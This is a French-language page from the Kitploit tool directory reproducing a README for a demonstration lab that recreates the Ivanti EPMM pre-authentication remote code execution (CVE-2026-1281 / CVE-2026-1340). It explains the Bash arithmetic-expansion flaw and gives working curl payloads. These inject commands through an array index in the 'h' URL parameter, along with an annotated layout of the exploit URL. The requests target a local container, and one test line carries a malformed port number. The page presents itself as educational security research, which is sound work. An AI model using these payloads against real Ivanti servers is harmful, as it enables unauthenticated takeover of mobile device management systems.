Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE — Une simple application de démonstration qui montre comment reproduire la vulnérabilité RCE pré-authentification Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) à des fins éducatives et de recherche en sécurité. | Kitploit
Outils/GitHubGitHub/yunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubyunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce

CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

Une simple application de démonstration qui montre comment reproduire la vulnérabilité RCE pré-authentification Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) à des fins éducatives et de recherche en sécurité.

Voir le dépôt
3il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Cible factice RCE pré-authentification Ivanti EPMM

Une application de démonstration simple qui montre comment reproduire la vulnérabilité RCE pré-authentification Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) à des fins éducatives et de recherche en sécurité.

Présentation de la vulnérabilité

Cette vulnérabilité exploite le comportement de l'expansion arithmétique de Bash. Lorsqu'une variable contenant une référence à une autre variable est utilisée dans un contexte arithmétique, et que cette variable référencée contient un index de tableau avec substitution de commande, la commande est exécutée.

La chaîne d'exploitation

  1. La requête contient st=theValue (chaîne littérale « theValue » avec un remplissage)
  2. La requête contient h=gPath[\commande`]` (commande dans l'index du tableau)
  3. Le script Bash analyse les paires clé=valeur dans une boucle, en mettant à jour theValue à chaque itération
  4. gStartTime est défini sur la chaîne littérale "theValue"
  • Après la boucle, theValue contient gPath[\commande`]`
  • Lorsque [[ ${currentTime} -gt ${gStartTime} ]] est évalué :
    • ${gStartTime} → "theValue" (chaîne)
    • Le contexte arithmétique traite theValue comme une référence de variable
    • theValue → gPath[\commande`]`
    • L'index du tableau déclenche la substitution de commande → RCE !
  • Démarrage rapide

    root@kitploit:~
    # Construire et démarrer le conteneur
    docker-compose up --build -d
    
    # Vérifier qu'il fonctionne
    curl http://localhost:8180/health
    

    Tester la vulnérabilité

    1. Test de création de fichier

    Créez un fichier pour prouver l'exécution de commande :

    root@kitploit:~
    # Charge utile encodée en URL : id > /mi/poc
    curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"
    
    # Vérifier si le fichier a été créé
    cat artifacts/poc
    

    2. Test basé sur le temps

    Vérifiez avec une commande sleep :

    root@kitploit:~
    # La réponse devrait prendre ~5 secondes
    time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"
    

    3. Exécution de commande personnalisée

    root@kitploit:~
    # Écrire un contenu personnalisé
    curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"
    
    cat artifacts/pwned
    

    Structure de l'URL

    root@kitploit:~
    /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMMANDE%60%5D/uuid.ipa
                                   │      │              │              │
                                   │      │              │              └─ Charge utile : gPath[`COMMANDE`]
                                   │      │              └─ Horodatage de fin (10 chiffres quelconques)
                                   │      └─ CRITIQUE : « theValue » littéral + 2 espaces (10 caractères au total)
                                   └─ Index de clé (valeur quelconque)
    

    Débogage

    root@kitploit:~
    # Afficher les journaux du conteneur
    docker-compose logs -f
    
    # Ouvrir un shell dans le conteneur
    docker exec -it ivanti-epmm-vuln /bin/bash
    
    # Vérifier les journaux d'erreur nginx
    docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log
    

    Nettoyage

    root@kitploit:~
    docker-compose down
    rm -rf artifacts/*
    

    Références

    • Article de blog WatchTowr Labs

    Avertissement

    Ceci est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.

    Télécharger l’outil